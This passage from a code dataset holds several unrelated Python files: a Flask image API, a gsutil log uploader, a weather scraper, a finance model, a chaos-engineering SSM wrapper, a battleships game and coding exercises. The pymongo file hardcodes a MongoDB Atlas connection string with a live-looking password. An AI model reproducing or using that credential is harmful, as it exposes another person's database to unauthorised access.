flask_rest_app.api.imageops.dboperation import createImage\nfrom flask_rest_app.api.imageops.dboperation import deleteImage\nfrom flask_rest_app.api.imageops.serializers import (imageObject,\n returnImageObject)\nfrom flask_rest_app.api.restplus import api\nfrom flask_rest_app.api.authorization import auth\nfrom flask_rest_app.database.models import Image\n\nfrom flask_rest_app.api.imageops.imageopspil import (blackAndWhite,\n createSepia, xorSynth, pixelize, line, blur, contrast, mirror, flip,\n swapChannels, greyscale, mask, invert)\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('imageOps', description='Image operations')\n\n@ns.route('/')\nclass 
ImageResources(Resource):\n '''Image resource'''\n @ns.marshal_with(returnImageObject)\n def get(self):\n '''Get all Images'''\n image = Image.query.all()\n print (image)\n return image\n\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(imageObject)\n def post(self):\n '''Insert the image in database'''\n image = createImage(request.json)\n return image, 201\n\n@ns.route('/')\nclass ImageResource(Resource):\n '''Get a specific launcher build'''\n @ns.marshal_with(returnImageObject)\n def get(self, id):\n '''Get specific Image using id'''\n print (id)\n image = Image.query.filter(Image.id == id).one()\n print (image)\n return image\n\n @auth.login_required\n @ns.response(204, 'Image successfully deleted.')\n def delete(self, id):\n '''Delete the Image using id'''\n deleteImage(id)\n return None, 204\n\n@ns.route('/blackWhite')\nclass ImageBlackWhiteOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and convert to black and white'''\n image = createImage(request.json)\n blackAndWhite(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Sepia')\nclass ImageSepiaOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and sepia tone it'''\n image = createImage(request.json)\n createSepia(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Invert')\nclass ImageInvertOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and invert it'''\n image = createImage(request.json)\n invert(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Mask')\nclass ImageMaskOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Mask it'''\n image = createImage(request.json)\n mask(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Grey')\nclass ImageGreyOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Greyscale'''\n image = createImage(request.json)\n greyscale(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/SwapChannel')\nclass ImageSwapChannelOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Swap its rgb channels'''\n image = createImage(request.json)\n swapChannels(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Flip')\nclass ImageFlipOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and flip it'''\n image = createImage(request.json)\n flip(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Mirror')\nclass ImageMirrorOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Mirror'''\n image = createImage(request.json)\n mirror(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Contrast')\nclass ImageContrastOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n 
@ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and contrast it'''\n image = createImage(request.json)\n contrast(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Blur')\nclass ImageBlurOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and Blur'''\n image = createImage(request.json)\n blur(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Line')\nclass ImageLineOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and find its fractal lines'''\n image = createImage(request.json)\n line(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Pixelize')\nclass ImagePixelizeOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and pixelize it'''\n image = createImage(request.json)\n pixelize(image.imageLocalLocation)\n return image, 201\n\n@ns.route('/Xor')\nclass ImageXorOp(Resource):\n '''Image Resource'''\n @auth.login_required\n @ns.expect(imageObject)\n @ns.marshal_with(returnImageObject)\n def post(self):\n '''Insert the image and do xorSynth over it'''\n image = createImage(request.json)\n xorSynth(image.imageLocalLocation)\n return image, 201\n","repo_name":"cjsanjay/flask_nginx_docker_app","sub_path":"flask_rest_app/flask_rest_app/api/imageops/endpoints/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6610985633","text":"import sys\nimport subprocess\nimport time\nimport os\nimport tempfile\nimport requests\nimport threading\nimport base64\n\nabort_path = os.path.join(\n os.path.dirname(os.path.dirname(sys.argv[1])),\n 'abort-key'\n)\n\ndef abort():\n\n if not os.path.exists(abort_path):\n subprocess.check_call('gsutil cp %s abort.key' % abort_path, shell=True)\n print('<<>>')\n with open('abort.key', 'rb') as r:\n response = requests.post(\n os.environ.get(\"SIGNATURE_ENDPOINT\"),\n headers={\n 'Content-Type': 'application/json'\n },\n json={\n 'key': base64.b64encode(r.read()),\n 'id': os.environ.get(\"LAPDOG_SUBMISSION_ID\")\n }\n )\n if response.status_code == 200:\n response = requests.get('http://localhost:8000/api/workflows/v1/query?status=Running')\n print(\"(%d) : %s\" % (response.status_code, response.text))\n for workflow in response.json()['results']:\n print(\"WORKFLOW:\", workflow)\n print(requests.post('http://localhost:8000/api/workflows/v1/%s/abort' % workflow['id']).text)\n # for workflow in requests.get('http://localhost:8000/api/workflows/v1/query?status=Running').json():\n # print(requests.post('http://localhost:8000/api/workflows/v1/%s/abort' % workflow['id']).text)\n print(\"<<>>\")\n # subprocess.check_call('gsutil cp %s %s' % (handle.name, sys.argv[1]), shell=True)\n # sys.exit(\"Aborted\")\n else:\n print('<<>>')\n\ndef abort_worker():\n while True:\n for i in range(60):\n time.sleep(2)\n if subprocess.call('gsutil ls %s' % abort_path, shell=True) == 0:\n # abort key located\n print(\"ABORTING\")\n abort()\n\nthread = threading.Thread(\n target=abort_worker\n) # abort thread\nthread.daemon = True\nthread.start()\n\n\nclass BatchWriter:\n \"\"\"\n Better Log batching system\n Dispatches a chunk of log text after a set time or if the buffer 
reaches a set size\n Both thresholds increase as the total log volume increases\n \"\"\"\n\n def __init__(self):\n self.batch_start = None\n self.batch_contents = ''\n self.log_volume = 0\n self.lock = threading.Condition()\n self.thread = threading.Thread(\n target=self._threadworker,\n name=\"Batch writing thread\",\n )\n self.thread.daemon = True\n self.thread.start()\n\n def write(self, text):\n with self.lock:\n if self.batch_start is None:\n self.batch_start = time.time()\n self.batch_contents += text.rstrip() + '\\n'\n if self.dispatch_time() or self.dispatch_volume():\n self.lock.notify_all()\n\n def dispatch_time(self):\n if self.log_volume > 1073741824:\n wait_time = 1800\n elif self.log_volume > 52428800:\n wait_time = 300\n else:\n wait_time = 60\n return self.batch_start is not None and time.time() - self.batch_start >= wait_time\n\n def dispatch_volume(self):\n if self.log_volume > 1073741824:\n wait_size = 4096\n elif self.log_volume > 52428800:\n wait_size = 2048\n else:\n wait_size = 1024\n return len(self.batch_contents) >= wait_size\n\n def _threadworker(self):\n with tempfile.NamedTemporaryFile('w') as tmp:\n while True:\n with self.lock:\n while not (self.dispatch_time() or self.dispatch_volume()):\n self.lock.wait(10)\n tmp.write(self.batch_contents)\n self.log_volume += (\n self.log_volume # Yes we want to include this, because the upload re-writes the blob\n + len(self.batch_contents)\n )\n self.batch_contents = ''\n self.batch_start = None\n tmp.flush()\n subprocess.check_call('gsutil -h \"Content-Type:text/plain\" cp %s %s' % (tmp.name, sys.argv[1]), shell=True)\n\nwriter = BatchWriter()\nwhile True:\n line = input() # Dumb, but will crash when stdin closes\n if line.rstrip() == '<<>>':\n sys.exit(0)\n writer.write(line)\n # tmp.write('\\n(VOLUME %d)\\n' % volume)\n print(line.rstrip())\n","repo_name":"getzlab/lapdog","sub_path":"lapdog/cromwell/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36680427022","text":"from datetime import datetime, time, date, timedelta\nfrom threading import Thread\nfrom time import sleep\nimport requests\nfrom bs4 import BeautifulSoup\nimport math\nfrom triggers.data.text_data import TextData\n\nclass MeteoFranceData(Thread, TextData):\n name = \"Météo France\" \n meteo_path = \"/grenoble/38000\" \n min_temp = None\n max_temp = None\n weather = None\n variables_str = [None,None,None]\n data_str = \"Météo : {0}, {1}, temps : {2}.\"\n\n last_fetch = datetime.min\n nb_error = 0\n status = \"INIT\"\n error_code = None\n _runtime_updated = False\n enabled = True\n\n def load_configuration(self, configuration, runtime):\n super(MeteoFranceData, self).load_configuration(configuration,runtime)\n if \"meteoPath\" in configuration:\n self.meteo_path = configuration[\"meteoPath\"]\n if \"stringData\" in configuration:\n self.data_str = configuration[\"stringData\"]\n\n def __init__(self, configuration, runtime):\n Thread.__init__(self)\n TextData.__init__(self,configuration,runtime)\n\n def fetch_data(self): \n if not self.enabled:\n return\n self.last_fetch = datetime.now()\n\n self.min_temp = None\n self.max_temp = None\n self.weather = None\n self.variables_str[0] = \"\"\n self.variables_str[1] = \"\"\n self.variables_str[2] = \"\"\n self.status = \"INIT\"\n\n result = None\n try:\n result = requests.get(\"http://www.meteofrance.com/previsions-meteo-france\"+self.meteo_path, timeout=5) \n except 
requests.exceptions.Timeout:\n            self._set_error_code(\"GET_DATA_TIMEOUT\")\n            return\n\n        soup = BeautifulSoup(result.text, 'html.parser')\n        liste_jours = soup.findAll(\"div\",{\"class\": \"liste-jours\"})\n        if liste_jours is None or len(liste_jours) == 0:\n            self._set_error_code(\"LISTE_JOURS_NOT_FOUND\")\n            return\n        \n        active = liste_jours[0].findAll(\"li\",{\"class\": \"active\"})\n        if active is None or len(active) == 0:\n            self._set_error_code(\"ACTIVE_NOT_FOUND\")\n            return\n\n        min_temperature = active[0].findAll(\"span\",{\"class\": \"min-temp\"})\n        if min_temperature is None or len(min_temperature) == 0:\n            self._set_error_code(\"MIN_TEMPERATURE_NOT_FOUND\")\n            return\n\n        max_temperature = active[0].findAll(\"span\",{\"class\": \"max-temp\"})\n        if max_temperature is None or len(max_temperature) == 0:\n            self._set_error_code(\"MAX_TEMPERATURE_NOT_FOUND\")\n            return\n\n        self.min_temp = min_temperature[0].text\n        self.max_temp = max_temperature[0].text\n        self.weather = active[0].attrs[\"title\"]\n        self.variables_str[0] = self.min_temp\n        self.variables_str[1] = self.max_temp\n        self.variables_str[2] = self.weather\n        self.status = \"OK\"\n        if (self.error_code is not None):\n            self.error_code = None\n            self._runtime_updated = True\n        self.nb_error = 0\n        print(\"[\"+datetime.now().isoformat()+\"] Meteo france : \"+self.data_str.format(self.min_temp, self.max_temp, self.weather))\n    \n    def run(self):\n        while True:\n            difference_fetch = (datetime.now() - self.last_fetch).total_seconds()\n            if (self.status == \"ERROR\" and difference_fetch > 60 * min(math.pow(2,self.nb_error),1440)):\n                self.fetch_data()\n            elif (difference_fetch >= 3 * 60 * 60 ):\n                self.fetch_data()\n            sleep(60) ","repo_name":"elblaa/elreveil","sub_path":"triggers/data/data_meteo.py","file_name":"data_meteo.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12855341912","text":"import random\nfrom typing import List\n\n\nclass Location:\n    def __init__(self, name, space):\n        self.name = name\n        self.space = space\n\n\nclass Cat:\n    def __init__(self, location: List[Location], name, age, weight, current_location: Location, sq_area):\n        self.location = location\n        self.name = name\n        self.age = age\n        self.weight = weight\n        self.current_location = current_location\n        self.sq_area = sq_area\n        self.change_location(current_location.name)\n\n    def change_location(self, lol_location):\n\n        def valid_location(location, sq_area, lol_location):\n            if location.name != lol_location:\n                if location.space > sq_area * 2:\n                    return True\n                elif location.space < sq_area / 2:\n                    return True\n            return False\n\n        list_filter = list(filter((lambda x: valid_location(x, self.sq_area, lol_location)), self.location))\n        self.current_location = random.choice(list_filter)\n\n    def cat_dead(self):\n        if self.age > 20:\n            print('the cat died')\n\n\nbox = Location(\"Box\", 3)\nchair = Location(\"Chair\", 6)\nfridge = Location(\"Fridge\", 18)\n\ncat_place = [box, chair, fridge]\ncat = Cat(cat_place, \"Chmo\", 21, 21, chair, 21)\ncat.cat_dead()\n\nprint(cat.current_location.name)\n","repo_name":"nester256/Tasks","sub_path":"Practice/11/7.11.22/class_work.py","file_name":"class_work.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15301950653","text":"import pymongo\n\n# Writes JSON documents to a MongoDB Atlas cluster\ndef write_mongo_local(test_data):\n\n    myclient = 
pymongo.MongoClient(\"mongodb+srv://woz:THeIGuana2306!)@clusterinitial.mdrttii.mongodb.net/?retryWrites=true&w=majority\")\n    mydb = myclient[\"weather\"]\n    mycol = mydb[\"melb_hourly\"]\n    x = mycol.insert_many(test_data)\n\n    return x.inserted_ids\n\n\n\n","repo_name":"willosullivan/-Big-Data-Weather-API","sub_path":"mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70006818087","text":"vowel=[\"A\",\"E\",\"I\",\"O\",\"U\"]\r\nconsonants=[\"B\",\"C\",\"D\",\"F\",\"G\",\"H\",\"J\",\"K\",\"L\",\"M\",\"N\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\r\nb=input(\"\")\r\nl_string=len(b)\r\nlist_string=[]\r\nvowel_list=[]\r\nconsonant_list=[]\r\nfor i in range(l_string):\r\n    c=b[i]\r\n    list_string.append(c)\r\nrange_string=1\r\nmain=0\r\nvowel_win=0\r\nconsonant_win=0\r\n# Scoring loop (reconstructed): a substring starting at index main can end at\r\n# any of the l_string-main positions that follow, so each start index is worth\r\n# l_string-main points to whoever owns its first letter.\r\nwhile main<l_string:\r\n    if list_string[main] in vowel:\r\n        vowel_win+=l_string-main\r\n    else:\r\n        consonant_win+=l_string-main\r\n    main+=1\r\nif vowel_win>consonant_win:\r\n    print(\"Kevin\",vowel_win)\r\nelif vowel_win==consonant_win:\r\n    print(\"Draw\")\r\nelse:\r\n    print(\"Stuart\",consonant_win)\r\n","repo_name":"quos21/harshit","sub_path":"Miniongame.py","file_name":"Miniongame.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10476843848","text":"from math import log, sqrt, exp\nfrom typing import Tuple\nfrom scipy.optimize import fsolve\nfrom scipy.stats import norm\n\n\nclass ContingentClaimAnalysis:\n    \"\"\":doc:`/measures/contingent_claim_analysis`\"\"\"\n\n    def __init__(self) -> None:\n        pass\n\n    @staticmethod\n    def estimate(\n        equity: float,\n        volatility: float,\n        risk_free_rate: float,\n        default_barrier: float,\n        time_to_maturity: float,\n        cds_spread: float,\n    ) -> Tuple[float, float]:\n        r\"\"\"Systemic risk based on contingent claim analysis (CCA).\n\n        Args:\n            equity (float): the market value of the equity of the firm.\n            volatility (float): the volatility of equity.\n            risk_free_rate (float): the risk-free rate in annualized terms.\n            default_barrier (float): the face value of the outstanding debt at maturity.\n            time_to_maturity (float): the time to maturity of the debt.\n            cds_spread (float): the CDS spread for the firm.\n\n        Returns:\n            Tuple[float, float]: A tuple of put price and the firm's contribution to the systemic risk indicator (put price - CDS put price).\n        \"\"\"\n\n        def cca_func(x, e, vol, rf, d, t):\n            init_e, init_vol = x\n            d1 = (log(pow(init_e, 2) / d) + (rf + (pow(init_vol, 4)) / 2) * t) / (\n                pow(init_vol, 2) * sqrt(t)\n            )\n            d2 = d1 - pow(init_vol, 2) * sqrt(t)\n\n            eqty = e - init_e**2 * norm.cdf(d1) + d * exp(-rf * t) * norm.cdf(d2)\n            sigm = e * vol - init_e**2 * init_vol**2 * norm.cdf(d1)\n\n            return eqty, sigm\n\n        # We need to solve a system of non-linear equations for asset price and asset volatility\n        # x = [equity, volatility]\n        x = fsolve(\n            cca_func,\n            (equity, volatility), # initial values set to equity and its volatility\n            args=(\n                equity,\n                volatility,\n                risk_free_rate,\n                default_barrier,\n                time_to_maturity,\n            ),\n        )\n\n        # We solved for (asset price)^1/2 and (asset volatility)^1/2 to ensure the\n        # values are positive. 
We recover asset price and asset volatility here.\n        x = x**2\n\n        # Solve for implied price of put\n        d1 = (\n            log(x[0] / default_barrier)\n            + (risk_free_rate + (x[1] ** 2) / 2) * time_to_maturity\n        ) / (x[1] * sqrt(time_to_maturity))\n        d2 = d1 - x[1] * sqrt(time_to_maturity)\n\n        # The price of the put\n        put_price = default_barrier * exp(\n            -risk_free_rate * time_to_maturity\n        ) * norm.cdf(-d2) - x[0] * norm.cdf(-d1)\n\n        # Solve for price of CDS implied put\n        # Risky debt\n        debt = default_barrier * exp(-risk_free_rate * time_to_maturity) - put_price\n\n        # The price of the CDS put option\n        cds_put = (\n            (\n                1\n                - exp(\n                    -(cds_spread / 10000)\n                    * (default_barrier / debt - 1)\n                    * time_to_maturity\n                )\n            )\n            * default_barrier\n            * exp(-risk_free_rate * time_to_maturity)\n        )\n\n        return put_price, put_price - cds_put\n","repo_name":"mgao6767/frds","sub_path":"src/frds/measures/_contingent_claim_analysis.py","file_name":"_contingent_claim_analysis.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"30883899395","text":"from typing import Any, Dict, List\n\nfrom chaosaws import aws_client\nfrom chaosaws.ssm.actions import send_command as send_command_wrapped\nfrom chaosaws.types import AWSResponse\nfrom chaoslib.exceptions import FailedActivity\nfrom chaoslib.types import Configuration, Secrets\nfrom devlearnops import select_items\nfrom logzero import logger\n\n__all__ = [\"send_command\"]\n\n\ndef send_command(\n    document_name: str,\n    targets: List[Dict[str, Any]] = None,\n    targets_percent: int = 100,\n    targets_count: int = None,\n    document_version: str = \"$DEFAULT\",\n    parameters: Dict[str, Any] = None,\n    timeout_seconds: int = 60,\n    max_concurrency: str = None,\n    max_errors: str = \"0\",\n    configuration: Configuration = None,\n    secrets: Secrets = None,\n) -> AWSResponse:\n    \"\"\"\n    Wraps the send_command action to allow selecting a subset of instances to attack.\n\n    An SSM document defines the actions that SSM performs on your managed\n    instances.\n    For more information about SSM SendCommand:\n    https://docs.aws.amazon.com/systems-manager/latest/APIReference/API_SendCommand.html\n    https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ssm.html#SSM.Client.send_command\n    \"\"\"\n    # pylint: disable=too-many-arguments\n\n    client = aws_client(\"ssm\", configuration, secrets)\n\n    results = client.describe_instance_information(\n        Filters=targets,\n    )\n    instances = select_items(\n        results[\"InstanceInformationList\"], count=targets_count, percent=targets_percent\n    )\n\n    instance_ids = list(map(lambda i: i[\"InstanceId\"], instances))\n    if not instance_ids:\n        raise FailedActivity(\n            \"Could not select valid instances from Systems Manager fleet.\"\n            \" Make sure EC2 instances are correctly registered in Systems Manager\"\n            \" or use more inclusive [count|percent] attributes.\"\n        )\n    logger.info(\"Selecting SSM managed instances: %s\", str(instance_ids))\n\n    if not max_concurrency:\n        max_concurrency = str(len(instance_ids))\n\n    return send_command_wrapped(\n        document_name=document_name,\n        targets=[{\"Key\": \"InstanceIds\", \"Values\": instance_ids}],\n        document_version=document_version,\n        parameters=parameters,\n        timeout_seconds=timeout_seconds,\n        max_concurrency=max_concurrency,\n        max_errors=max_errors,\n        configuration=configuration,\n        secrets=secrets,\n    
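    # note: targets was narrowed above to the sampled instance ids; all other\n        # keyword arguments pass through to the wrapped chaosaws action unchanged.\n    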
)\n","repo_name":"DevLearnOps/chaostoolkit-starter-pack-aws","sub_path":"modules/devlearnops/aws/ssm/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72394890088","text":"import sys\nimport PyQt5.QtWidgets as QW\nimport PyQt5.QtMultimedia as QM\nimport PyQt5.QtCore as QC\n\n\nclass WidgetMusicPlayer(QW.QWidget):\n def __init__(self):\n super().__init__()\n\n self.player = QM.QMediaPlayer()\n self.btn_play = QW.QPushButton('Play')\n self.btn_pause = QW.QPushButton('Pause')\n\n # init method\n self.init_ui()\n self.init_event()\n self.init_method()\n\n def init_ui(self):\n self.btn_play.setFixedWidth(100)\n self.btn_pause.setFixedWidth(100)\n\n # layout\n hbox0 = QW.QHBoxLayout()\n hbox0.addWidget(self.btn_play)\n hbox0.addWidget(self.btn_pause)\n hbox0.addStretch()\n self.setLayout(hbox0)\n\n def init_method(self):\n self.player.setNotifyInterval(100)\n\n def init_event(self):\n self.btn_play.clicked.connect(self.play_handler)\n self.btn_pause.clicked.connect(self.pause_handler)\n\n def play_handler(self):\n self.player.play()\n\n def pause_handler(self):\n self.player.pause()\n\n def set_contents(self, file_path):\n self.player.setMedia(\n QM.QMediaContent(QC.QUrl.fromLocalFile(file_path))\n )\n\n\ndef main():\n app = QW.QApplication(sys.argv)\n\n\n w = WidgetMusicPlayer()\n w.move(600, 500)\n # w.set_contents(file_path)\n w.show()\n\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fkubota/spectrogram-tree","sub_path":"src/widget_music_player.py","file_name":"widget_music_player.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"71195147369","text":"\"\"\"Game runner board.\"\"\"\n\nfrom enum import Enum\nfrom typing import List, Sequence, Union\n\n\nclass FieldState(Enum):\n EMPTY = \" \"\n SHIP = \"O\"\n HIT = \"H\"\n MISSED = \"X\"\n\n\nclass ShotResult(Enum):\n MISS = \"miss\"\n PREVIOUS_MISS = \"previous_miss\"\n HIT = \"hit\"\n PREVIOUS_HIT = \"previous_hit\"\n INVALID = \"invalid\"\n\n\nclass Field:\n _transitions = {\n FieldState.EMPTY: (FieldState.MISSED, ShotResult.MISS),\n FieldState.SHIP: (FieldState.HIT, ShotResult.HIT),\n FieldState.HIT: (FieldState.HIT, ShotResult.PREVIOUS_HIT),\n FieldState.MISSED: (FieldState.MISSED, ShotResult.PREVIOUS_MISS)\n }\n\n def __init__(self) -> None:\n \"\"\"Instantiate an empty field.\"\"\"\n self.state = FieldState.EMPTY\n\n def drop_bomb(self) -> ShotResult:\n \"\"\"\n Drop bomb on field. Field will change its state appropriately\n and return an informative result to the user.\n\n :return: Informative shot result\n \"\"\"\n self.state, result = self._transitions[self.state]\n return result\n\n def __repr__(self) -> str:\n return f\"<{type(self).__name__}: {self.state}>\"\n\n\nclass Board:\n\n def __init__(self,\n size: int = 12,\n ships: Sequence[int] = (2, 3, 3, 4, 5)) -> None:\n self.size = size\n self._board = [[Field() for _ in range(size)] for _ in range(size)]\n self._ships = [] # type: List[List[Field]]\n self._remaining_ships = list(ships)\n\n def drop_bomb(self, x: int, y: int) -> ShotResult:\n \"\"\"\n Drop bomb on field. Field will change its state appropriately\n and return an informative result to the user. 
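A minimal\n        usage sketch (coordinates are illustrative):\n\n            board = Board()\n            board.place_ship(2, 0, 0, True)\n            board.drop_bomb(0, 0)   # -> ShotResult.HIT\n            board.drop_bomb(5, 5)   # -> ShotResult.MISS\n\n        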
If the\n coordinates point to an invalid field, an exception will be\n raised.\n\n :param x: Shot x-coordinate\n :param y: Shot y-coordinate\n :return: Shot result\n :raise ValueError: Invalid coordinates\n \"\"\"\n try:\n field = self._board[y][x]\n except IndexError as e:\n raise ValueError(\"Invalid coordinates\") from e\n else:\n return field.drop_bomb()\n\n def place_ship(self, size: int, x: int, y: int, horizontal: bool):\n \"\"\"\n Places a ship starting from the field (x, y) and increasing in\n x values if horizontal is true or increasing in y values if\n horizontal is false.\n\n If unsuccessful in placing ship (not enough fields or they are\n already taken) it will raise a ValueError exception.\n\n :param size: Ship size\n :param x: Starting x-coordinate\n :param y: Starting y-coordinate\n :param horizontal: Ship direction\n :raise ValueError: Incorrect arguments\n \"\"\"\n # Check if ship size is valid\n try:\n self._remaining_ships.remove(size)\n except ValueError as e:\n raise ValueError(f\"No more ships of size {size} allowed\") from e\n\n # Check if we can allocate enough fields\n try:\n if horizontal:\n fields = self._board[y][x:x + size]\n else:\n fields = [column[x] for column in self._board[y:y + size]]\n except IndexError as e:\n raise ValueError(\"Not enough space to place ship\") from e\n if len(fields) != size:\n raise ValueError(\"Not enough space to place ship\")\n\n # Check if fields are already taken\n for field in fields:\n if field.state is not FieldState.EMPTY:\n raise ValueError(\"Trying to place on existing ship\")\n\n # Assign fields to a ship\n self._ships.append(fields)\n for field in fields:\n field.state = FieldState.SHIP\n\n @property\n def still_floating(self) -> bool:\n \"\"\"\n Simple check to see if anything is still floating.\n\n :return: true if something floats, false otherwise\n \"\"\"\n for ship in self._ships:\n for part in ship:\n if part.state is FieldState.SHIP:\n return True\n return False\n\n def emojify(self, print_board: bool = True) -> Union[str, None]:\n \"\"\"\n Compact representation of a board leveraging the latest and\n greatest UI toolkits.\n\n :param print_board: Print instead of returning representation.\n :return: If not print_board, return representation.\n \"\"\"\n emojis = {\n FieldState.EMPTY: '🌊',\n FieldState.SHIP: '🚣 ',\n FieldState.HIT: '💥',\n FieldState.MISSED: '🎣'\n }\n meme = '\\n'.join(''.join(emojis[f.state] for f in row)\n for row in reversed(self._board))\n if print_board:\n print(meme)\n return None\n else:\n return meme\n\n def __getitem__(self, item):\n if not isinstance(item, tuple) and len(item) == 2:\n raise ValueError(f\"Expecting coordinates, got {item}\")\n return self._board[item[1]][item[0]]\n\n def __str__(self) -> str:\n \"\"\"\n Have mercy on me. 
Pipe-y drawing of a board.\n\n        :return: Something nicer than the implementation.\n        \"\"\"\n        num = f'   {\" \".join(str(n).center(3) for n in range(self.size))}\\n'\n        top = f'  ╔{\"╤\".join([\"═══\"] * self.size)}╗\\n'\n        mid = f'  ╟{\"┼\".join([\"───\"] * self.size)}╢\\n'\n        bot = f'  ╚{\"╧\".join([\"═══\"] * self.size)}╝\\n'\n\n        rows = []\n        for number, row in enumerate(reversed(self._board)):\n            n = str(self.size - 1 - number)\n            r = [field.state.value.center(3) for field in row]\n            rows.append(f'{n.rjust(2)}║{\"│\".join(r)}║{n.ljust(2)}\\n')\n        return (num + top + mid.join(rows) + bot + num).rstrip()\n","repo_name":"buhanec/_thing","sub_path":"battleships/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71679710568","text":"\"\"\"\nDavid has several containers, each with a number of balls in it. He has just enough containers to sort each type of ball he has into its own container, and he wants to do the sorting using only swap operations.\n\nDavid wants to perform some number of swap operations such that:\n\nEach container contains only balls of the same type.\nNo two balls of the same type are located in different containers.\n\nExample\n\nIn a single operation, David can swap two balls located in different containers. (The original problem statement illustrates this with diagrams of two containers holding green and red balls; in that example no sequence of swaps can gather all green balls in one container and all red balls in the other, so the answer is Impossible.)\n\nYou must perform q queries, where each query is given as an n x n matrix. For each query, print Possible on a new line if David can satisfy the conditions above for the given matrix. 
Otherwise, print Impossible.\n\nFor instance, the matrix [[1, 4], [2, 3]] has container capacities (row sums) [5, 5] but ball-type totals (column sums) [3, 7]; no sequence of swaps can reconcile these, so the answer is Impossible.\n\nFunction Description\n\nComplete the organizingContainers function in the editor below.\n\norganizingContainers has the following parameter(s):\n\nint container[n][n]: a two dimensional array of integers that represent the number of balls of each type in each container\n\nReturns\n\nstring: either Possible or Impossible\n\nInput Format\n\nThe first line contains an integer q, the number of queries.\n\nEach of the next q sets of lines is as follows:\n\nThe first line contains an integer n, the number of containers (rows) and ball types (columns).\nEach of the next n lines contains n space-separated integers describing a row of the matrix.\n\"\"\"\ndef organizingContainers(container):\n    # A swap can move any single ball into any container, so container\n    # capacities (row sums) and per-type ball counts (column sums) are\n    # invariant. Sorting succeeds exactly when the sorted row sums match\n    # the sorted column sums.\n    row_sums = sorted(sum(row) for row in container)\n    col_sums = sorted(sum(col) for col in zip(*container))\n    return \"Possible\" if row_sums == col_sums else \"Impossible\"\n\nif __name__ == \"__main__\":\n    test = True\n    if not test:\n        test_case = int(input())\n        for _ in range(test_case):\n            size = int(input())\n            matrix = [list(map(int, input().split(\" \"))) for __ in range(size)]\n            print(organizingContainers(matrix))\n    else:\n        test_data = [[1, 3, 1], [2, 1, 2], [3, 3, 3]]\n        